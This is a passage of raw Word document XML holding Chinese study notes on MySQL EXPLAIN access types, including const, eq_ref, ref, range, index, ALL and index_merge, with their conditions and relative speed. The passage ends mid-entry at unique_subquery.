    <w:p w14:paraId="43FDA1E9" w14:textId="77777777" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eq_ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询，等值匹配，对于前表的每一行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(row)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，后表只有一行命中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743935CB" w14:textId="77777777" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：非唯一索引，等值匹配，可能有多行命中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D197E5" w14:textId="77777777" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：索引上的范围扫描，例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>between/in/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCFC70" w14:textId="77777777" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：索引上的全集扫描，例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCE39E4" w14:textId="01B5568A" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最慢：全表扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(full table scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539F6A0" w14:textId="77777777" w:rsidR="00ED52E1" w:rsidRDefault="00ED52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483285C5" w14:textId="77777777" w:rsidR="000F6338" w:rsidRPr="000F6338" w:rsidRDefault="000F6338" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C08F06" w14:textId="77777777" w:rsidR="0039292A" w:rsidRPr="000F7493" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7493">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>链接类型</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7493">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BA888" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A6923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006A6923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表只有一行，</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D3438B" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50810871" w14:textId="5126A7FC" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A6923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主键或唯一索引查找常量值，只有一条记录，并且是</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C4C003" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABD2A99" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F7493">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7493">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000F7493">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>常量连接，表最多只有一行匹配，通用用于主键或者唯一索引比较时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4B2AB" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9C9C61" w14:textId="77777777" w:rsidR="000F7493" w:rsidRDefault="000F7493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描的条件为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42282388" w14:textId="77777777" w:rsidR="000F7493" w:rsidRDefault="000F7493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）命中主键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(primary key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者唯一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(unique)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5170B0" w14:textId="18E800A2" w:rsidR="000F7493" w:rsidRDefault="000F7493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）被连接的部分是一个常量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(const)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563E2AF4" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1617E41C" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>eq_ref</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>每次与之前的表合并行都只在该表读取一行，这是除了</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>之外最好的一种，特点是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，而且索引的所有部分都参与</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB37DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>且索引是主键或非空唯一键的索引</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440737B3" w14:textId="3EEE9EA9" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16788B7C" w14:textId="77777777" w:rsidR="00BA4AD9" w:rsidRDefault="00BA4AD9" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eq_ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描的条件为，对于前表的每一行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(row)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，后表只有一行被扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298BDF34" w14:textId="77777777" w:rsidR="00BA4AD9" w:rsidRDefault="00BA4AD9" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FE887B" w14:textId="77777777" w:rsidR="00BA4AD9" w:rsidRDefault="00BA4AD9" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）命中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(primary key) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非空唯一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(unique not null) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931F001" w14:textId="40C6D889" w:rsidR="00BA4AD9" w:rsidRDefault="00BA4AD9" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）等值连接；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316F94E" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D96C650" w14:textId="63F0AC83" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F0274E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r w:rsidRPr="00F0274E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F0274E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果每次只匹配少数行，那就是比较好的一种，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F0274E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F0274E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00F0274E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F0274E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，可以是左覆盖索引或非主键或非唯一键</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B5F82" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28293B2C" w14:textId="77777777" w:rsidR="00F0274E" w:rsidRDefault="00F0274E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为普通非唯一索引后，常量的连接查询，也由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>降级为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为也可能有多于一行的数据被扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1699BB" w14:textId="50CFC83F" w:rsidR="006A6923" w:rsidRDefault="00F0274E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描，可能出现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里，也可能出现在单表普通索引里，每一次匹配可能有多行数据返回，虽然它比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eq_ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要慢，但它仍然是一个很快的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA1954" w14:textId="77777777" w:rsidR="00F0274E" w:rsidRDefault="00F0274E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B59D54" w14:textId="77777777" w:rsidR="00F0274E" w:rsidRDefault="00F0274E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C42B120" w14:textId="610BD5D1" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fulltext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全文搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4755D9" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1891A1A1" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7591C5BB" w14:textId="7AB54E81" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ref_or_null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似，但包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B892BDE" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD71E4A" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745B7E1B" w14:textId="3864CB46" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index_merge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示出现了索引合并优化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括交集，并集以及交集之间的并集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但不包括跨表和全文索引。这个比较复杂，目前的理解是合并单表的范围索引扫描（如果成本估算比普通的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要更优的话）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F3C5B" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3D4484" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7501D6A7" w14:textId="1C8B18A5" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique_subquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
